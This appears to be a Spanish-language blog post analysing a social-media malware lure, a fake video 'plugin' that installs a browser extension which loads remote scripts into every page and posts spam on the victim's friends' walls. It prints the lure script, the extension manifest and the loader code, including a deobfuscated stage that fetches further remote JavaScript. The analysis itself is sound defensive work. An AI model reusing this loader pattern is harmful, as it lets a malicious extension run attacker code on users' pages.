Un amigo me pega en el muro modelos se les sale la teta y que no se que y yo WTF!!???
Entro y me sale esta hermosura:

Lo Mas hermosos de esto es que el que lo programó fue bien astuto por que si es un plugin! pongo ver el codigo fuente y veo esto:
<center><p>Instala el Plugin para reproducir el video</p></center>
<div align="left" style="width:550px;height:437px;overflow:hidden;" id="videitos">
<center> <div id="liframe"><iframe id="change" width="500" src="http://xxxxxx.com/xxxx.html" height="300" scrolling="no" frameborder="0"></iframe></div></center>
Viendo la fuente del archivo xxxx.html encontré esto:
<script>
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
function instalar(){
if (is_chrome){
window.open("http://xxxxx.com/plugin.crx");
} else if(is_firefox){
var params = {
"Youtube Extension": {
URL: "http://xxxxx.com/plugin.xpi",
toString: function () { return this.URL; }
}
};
InstallTrigger.install(params);
} else{
window.open("http://www.google.com/chrome/eula.html");
}
}
</script>
Quise ir un poco mas hayá y levanté mi máquina virtual... instalé mi google chrome y a infectarnos se ha dicho...
Luego fui a:
C:\Users\1337test\AppData\Local\Google\Chrome\User Data\Default\Extensions
Busqué la carpeta del plugin y encontré 5 Archivos:
go.js
icon16.png
icon48.png
icon128.png
manifest.json
En el go.js encontramos:
loadScript_YOU();
function loadScript_YOU() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://xxxxxxx.com/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}
En el manifest:
{
"content_scripts": [ {
"all_frames": true,
"js": [ "go.js" ],
"matches": [ "\u003Call_urls\u003E" ]
} ],
"description": "Reproduce videos online alojados youtube, m\u00E1s r\u00E1pido y eficiente",
"icons": {
"128": "icon128.png",
"16": "icon16.png",
"48": "icon48.png"
},
"key": "xxxxxx",
"name": "Extension YouTube",
"permissions": [ "*://*/*" ],
"update_url": "xxxxxxx",
"version": "1.3.0"
}
Ahora lo importante en el go.js encontramos esto:
s.setAttribute("src", "http://xxxxxxx.com/script.js");
vamos a ver que hay dentro:
(Esto estaba encriptado ahora lo pongo desencriptado):
function addScript(_0xb530x2) {
var _0xb530x3 = document['createElement']('script');
_0xb530x3['setAttribute']('type', 'text/javascript');
_0xb530x3['setAttribute']('src', _0xb530x2);
var _0xb530x4 = document['getElementsByTagName']('script')[0];
if (_0xb530x4 == null) {
return false;
};
_0xb530x4['appendChild'](_0xb530x3);
return true;
};
addScript('http://xxxxxxxxx.com/ex.js');
Ahora vamos a ver que hay en:
addScript('http://xxxxxxxxx.com/ex.js');
Y lo que habia era...
Bueno no voy a poner el codigo porque es su chamba pes su codigo ellos lo programaron está ofuscado aparte pero bueno lo que hace es por metodo post lo publica en el muro de tus amigos diciendo:
var comment = "Estas chichas se pasan!!! " + etiquetas;
Bueno como se desinfectan? vayan todo para atras.
Saludos,
Dr.White